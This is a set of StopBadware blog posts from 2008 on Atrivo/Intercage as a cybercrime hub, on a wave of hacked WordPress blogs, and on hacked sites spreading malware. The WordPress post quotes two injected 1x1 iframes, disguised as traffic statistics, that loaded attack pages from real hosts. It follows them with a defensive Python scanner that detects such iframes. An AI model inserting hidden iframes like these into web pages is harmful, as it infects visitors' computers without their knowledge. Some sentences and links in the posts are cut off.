Report calls out Atrivo (Intercage) and affiliates

Jart Armin, community volunteer and intrepid security researcher, released a report today that concludes that Intercage and Atrivo, a California-based family of companies that operate web hosting, domain registration, and other online services, are a hub of badware activity:

Atrivo is a major hub of cyber crime based within the USA, and has been known as such within the Internet community for many years. Within this study we provide detailed evidence not only for public and community awareness but also to provide evidence for action.

Atrivo's reach in the cyber crime community and the Internet as a whole runs deep. From their partners in crime, to the domain registration and hosting services it has to be remembered this is deliberately misleading to avoid

Some of the companies included in the report have built a reputation in the security community as being havens for this type of activity, and Jart's extensive research raises questions about the degree to which these companies are aware of, and turn a blind eye to, badware activity on their systems.
The author and his collaborators also produced a video demonstrating how an Internet user can have his computer exploited via the systems and methods they describe in the report.

Note: StopBadware contributed data (based on our analysis of data received from Google and supplemented with information from Team Cymru) to Mr. Armin, as we support community-based research into badware trends. We did not vet, and do not have any official position on, the report's conclusions.

StopBadware discussion group sees flurry of hacked WordPress blogs

Posted on February 18, 2008 - 16:23 by egeorge

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group began receiving in January a flurry of reports about WordPress blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both of the following iframes were injected into their posts:

<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

<!-- Traffic Statistics -->
<iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren't put on the pages by the authors, and they're not for traffic statistics. The iframes, hosted on sites in Beijing, China, attack a visitor's computer with the virus

In this StopBadware thread about the iframes, a post by member Ty H describes how to use WordPress Site Admin to repair defaced blog posts.

In addition to repairing the pages, webmasters need to close the vulnerability that allows the iframe injections to occur.

On Feb. 5, WordPress issued version 2.3.3, an urgent security release to patch a flaw in xmlrpc.php that allowed a user to edit posts of other users. It's not stated whether this release is a response to the iframe injections, but the discussion group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at to receive email notifications when new versions are announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at

When users solve problems together in the StopBadware discussion group and report their findings, it helps others who encounter the same problem later.
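The traits Steven describes above (a 1x1 iframe, a fake "Traffic Statistics" comment wrapper, a src pointing at an unfamiliar host or a raw IP address) are easy to check for mechanically before Google flags the blog. The scanner below is an added example, not code from Steven's post or from StopBadware; the sample post bodies and the hostnames in them (stats.example.invalid, 192.0.2.10, video.example) are constructed placeholders, not the real iframe sources quoted above, and the allowed-host list is something each webmaster fills in for the embeds they intentionally use.

```python
"""Flag hidden iframes injected into WordPress post bodies.

Added example, not StopBadware's code. Checks the traits described in the
guest post: 1x1 (invisible) frames, a fake "Traffic Statistics" comment
wrapper, and a src pointing at a raw IP or a host the webmaster never
embeds from. Sample posts and hostnames below are constructed placeholders.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class _IframeCollector(HTMLParser):
    """Collect every <iframe> with its attributes, noting whether it sat
    between '<!-- Traffic Statistics -->' and '<!-- End Traffic Statistics -->'."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # list of (attrs_dict, inside_fake_wrapper)
        self._in_wrapper = False

    def handle_comment(self, data):
        text = data.strip().lower()
        if text == "traffic statistics":
            self._in_wrapper = True
        elif text == "end traffic statistics":
            self._in_wrapper = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append((dict(attrs), self._in_wrapper))


def _is_tiny(attrs):
    """True when width and height are both 0 or 1 pixel (an invisible frame)."""
    try:
        return int(attrs.get("width", "0")) <= 1 and int(attrs.get("height", "0")) <= 1
    except ValueError:
        return False  # percentage or garbage sizes are not the 1x1 pattern


def _host_is_raw_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def scan_post(html, allowed_hosts=()):
    """Return findings for one post body: a list of {"src", "reasons"} dicts.
    An empty list means no suspicious iframe was seen. allowed_hosts are the
    hostnames the webmaster deliberately embeds from (video sites etc.)."""
    parser = _IframeCollector()
    parser.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for attrs, in_wrapper in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if _is_tiny(attrs):
            reasons.append("1x1 (invisible) iframe")
        if in_wrapper:
            reasons.append("wrapped in fake 'Traffic Statistics' comments")
        if _host_is_raw_ip(host):
            reasons.append("src host is a raw IP address")
        if allowed and host and host not in allowed:
            reasons.append("src host %s is not in the allowed list" % host)
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


def scan_posts(posts, allowed_hosts=()):
    """Scan a {post_id: html} mapping; return only the posts with findings."""
    hits = {}
    for post_id, html in posts.items():
        findings = scan_post(html, allowed_hosts)
        if findings:
            hits[post_id] = findings
    return hits


# Constructed sample post bodies (placeholder hosts, not real indicators).
CLEAN_POST = """<p>Our talk from the meetup:</p>
<iframe src="http://video.example/embed/42" width="425" height="350"></iframe>"""

INJECTED_POST = """<p>Welcome back to the blog.</p>
<!-- Traffic Statistics -->
<iframe src="http://stats.example.invalid/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->
<!-- Traffic Statistics -->
<iframe src="http://192.0.2.10/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->"""


if __name__ == "__main__":
    hits = scan_posts({"post-1": CLEAN_POST, "post-2": INJECTED_POST},
                      allowed_hosts={"video.example"})
    for post_id, findings in hits.items():
        for finding in findings:
            print(post_id, finding["src"], "; ".join(finding["reasons"]))
```

In practice the post bodies would come from the wp_posts table (post_content) via a database dump or a small query, and the scan would be run after every upgrade and on a schedule, since reinfection of an unpatched install looks exactly like the first infection. The allowed-host list is what keeps a legitimate video embed from being reported alongside the injected frames.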

Half of malware-distributing websites have been hacked

Posted on January 22, 2008 - 16:40 by egeorge

Security vendor Websense has released a report showing that half of the malware-distributing websites it examined in the second part of 2007 were otherwise legitimate sites that had been hacked. The report points to unpatched software vulnerabilities and problems on shared hosting servers as key infection points for hacked sites.

For the many owners of hacked websites StopBadware has worked with over the past year, the fact that so many other sites are in the same predicament is slim consolation for the damage caused. Many owners of small business, nonprofit, and interest-based sites are what we at StopBadware have come to call "consumer webmasters" - website owners who've taken advantage of easy and cheap hosting plans and the simplicity of many content management systems to create fully functioning websites without needing technical skills. When a consumer webmaster's site is hacked, he or she has no technical staff to turn to, and may not even know where to look online for help.

If you're a website owner, don't wait until your site is hacked to find help. Talk with your web hosting provider about their security precautions, and ask them how they'd handle a malicious attack. Look for user forums for the software you use to manage your site, and make sure you'll be one of the first to know when there are new security updates. Finding a network of others working with the same website setup will mean you have peers to turn to if your site ever does run into problems.

Of course, StopBadware's own resources are also available. Our security tips for webmasters is designed for owners of any site, whether or not it has been the victim of a hacking attack. And our discussion group is a growing community where webmasters (and any internet user) can seek help and advice. For every internet user, the hacking of legitimate websites is a reason for caution. Even trusted sites can be attacked, so it's important to protect your computer regardless of where your web surfing takes you. If you don't know where to begin, start at our help pages on badware.